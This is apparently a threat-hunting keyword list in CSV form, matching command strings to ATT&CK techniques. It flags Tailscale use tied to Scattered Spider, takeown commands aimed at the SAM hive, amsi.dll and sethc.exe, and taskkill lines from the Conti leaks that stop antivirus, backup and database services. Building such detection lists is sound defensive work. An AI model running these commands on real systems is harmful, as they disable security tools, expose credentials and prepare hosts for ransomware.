"*rc-update add tailscale*",".{0,1000}rc\-update\sadd\stailscale.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*resolv.pre-tailscale-backup.conf*",".{0,1000}resolv\.pre\-tailscale\-backup\.conf.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*resolv.tailscale.conf*",".{0,1000}resolv\.tailscale\.conf.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*service tailscaled *",".{0,1000}service\stailscaled\s.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*Serving Tailscale web client on http://*",".{0,1000}Serving\sTailscale\sweb\sclient\son\shttp\:\/\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*Starting tailscaled*",".{0,1000}Starting\stailscaled.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*sudo tailscale up*",".{0,1000}sudo\stailscale\sup.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*systemctl enable --now tailscaled*",".{0,1000}systemctl\senable\s\-\-now\stailscaled.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale ip -4*",".{0,1000}tailscale\sip\s\-4.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*Tailscale is not running*",".{0,1000}Tailscale\sis\snot\srunning.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale ping -*",".{0,1000}tailscale\sping\s\-.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale serve -*",".{0,1000}tailscale\sserve\s\-.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale set --auto-update*",".{0,1000}tailscale\sset\s\-\-auto\-update.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*Tailscale SSH is *",".{0,1000}Tailscale\sSSH\sis\s.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale up --login-server=*",".{0,1000}tailscale\sup\s\-\-login\-server\=.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*Tailscale was already stopped*",".{0,1000}Tailscale\swas\salready\sstopped.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale.com/install.sh*",".{0,1000}tailscale\.com\/install\.sh.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale.com/logger.Logf*",".{0,1000}tailscale\.com\/logger\.Logf.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale.exe *",".{0,1000}tailscale\.exe\s.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale/go/releases/download/*",".{0,1000}tailscale\/go\/releases\/download\/.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale/net/dns/",".{0,1000}tailscale\/net\/dns\/","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale/tailscale.go*",".{0,1000}tailscale\/tailscale\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale\net\dns*",".{0,1000}tailscale\\net\\dns.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale\scripts\installer.sh*",".{0,1000}tailscale\\scripts\\installer\.sh.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale\tailscale.go*",".{0,1000}tailscale\\tailscale\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*Tailscaled exited*",".{0,1000}Tailscaled\sexited.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscaled.exe*",".{0,1000}tailscaled\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscaled.log*",".{0,1000}tailscaled\.log.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscaled.openrc*",".{0,1000}tailscaled\.openrc.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscaled.sh*",".{0,1000}tailscaled\.sh.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscaled.stdout.log*",".{0,1000}tailscaled\.stdout\.log.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscaled_notwindows.go*",".{0,1000}tailscaled_notwindows\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale-ipn.exe*",".{0,1000}tailscale\-ipn\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale-ipn.log.conf*",".{0,1000}tailscale\-ipn\.log\.conf.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale-setup-*.exe *",".{0,1000}tailscale\-setup\-.{0,1000}\.exe\s.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*tailscale-setup-full-*.exe*",".{0,1000}tailscale\-setup\-full\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*Updating Tailscale from *",".{0,1000}Updating\sTailscale\sfrom\s.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*yum.repos.d/tailscale.repo*",".{0,1000}yum\.repos\.d\/tailscale\.repo.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z"
"*takeown /f ""C:\windows\system32\config\SAM""*",".{0,1000}takeown\s\/f\s\""C\:\\windows\\system32\\config\\SAM\"".{0,1000}","greyware_tool_keyword","takeown","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*takeown /f C:\Windows\System32\amsi.dll /a*",".{0,1000}takeown\s\/f\sC\:\\Windows\\System32\\amsi\.dll\s\/a.{0,1000}","greyware_tool_keyword","takeown","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*takeown /f c:\windows\system32\sethc.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","greyware_tool_keyword","takeown","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*takeown /f c:\windows\system32\sethcold.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethcold\.exe.{0,1000}","greyware_tool_keyword","takeown","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*TASKKILL /F /FI ""PID ge 1000"" /FI ""WINDOWTITLE ne untitled*",".{0,1000}TASKKILL\s\/F\s\/FI\s\""PID\sge\s1000\""\s\/FI\s\""WINDOWTITLE\sne\suntitled.{0,1000}","greyware_tool_keyword","taskkill","forcefully kills processes based on a process ID (PID greater than or equal to 1000) has been used to disrupt various processes while avoiding certain window","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /F /IM lsass.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\slsass\.exe.{0,1000}","greyware_tool_keyword","taskkill","killing lsass process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://x.com/malmoeb/status/1741114854037987437","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /F /IM msiexec.exe*",".{0,1000}taskkill\s\/F\s\/IM\smsiexec\.exe.{0,1000}","greyware_tool_keyword","taskkill","evade EDR/AV by repairing with msiexec and killing the process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://badoption.eu/blog/2024/03/23/cortex.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*taskkill /im agntsvc.exe /F*",".{0,1000}taskkill\s\/im\sagntsvc\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Backup Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /IM CNTAoSMgr.exe /F*",".{0,1000}taskkill\s\/IM\sCNTAoSMgr\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Network Management","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im dbeng50.exe /F*",".{0,1000}taskkill\s\/im\sdbeng50\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im dbsnmp.exe /F*",".{0,1000}taskkill\s\/im\sdbsnmp\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im encsvc.exe /F*",".{0,1000}taskkill\s\/im\sencsvc\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Encryption Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im excel.exe /F*",".{0,1000}taskkill\s\/im\sexcel\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im firefoxconfig.exe /F*",".{0,1000}taskkill\s\/im\sfirefoxconfig\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Browser Configuration","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im infopath.exe /F*",".{0,1000}taskkill\s\/im\sinfopath\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im isqlplussvc.exe /F*",".{0,1000}taskkill\s\/im\sisqlplussvc\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /IM mbamtray.exe /F*",".{0,1000}taskkill\s\/IM\smbamtray\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Antivirus","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im msaccess.exe /F*",".{0,1000}taskkill\s\/im\smsaccess\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im msftesql.exe /F*",".{0,1000}taskkill\s\/im\smsftesql\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im mspub.exe /F*",".{0,1000}taskkill\s\/im\smspub\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im mydesktopqos.exe /F*",".{0,1000}taskkill\s\/im\smydesktopqos\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Remote Desktop Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im mydesktopservice.exe /F*",".{0,1000}taskkill\s\/im\smydesktopservice\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Remote Desktop Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im mysqld.exe /F*",".{0,1000}taskkill\s\/im\smysqld\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im mysqld-nt.exe /F*",".{0,1000}taskkill\s\/im\smysqld\-nt\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im mysqld-opt.exe /F*",".{0,1000}taskkill\s\/im\smysqld\-opt\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /IM Ntrtsc*",".{0,1000}taskkill\s\/IM\sNtrtsc.{0,1000}","greyware_tool_keyword","taskkill","stopping Antivirus","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im ocautoupds.exe /F*",".{0,1000}taskkill\s\/im\socautoupds\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im ocomm.exe /F*",".{0,1000}taskkill\s\/im\socomm\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*taskkill /im ocssd.exe /F*",".{0,1000}taskkill\s\/im\socssd\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
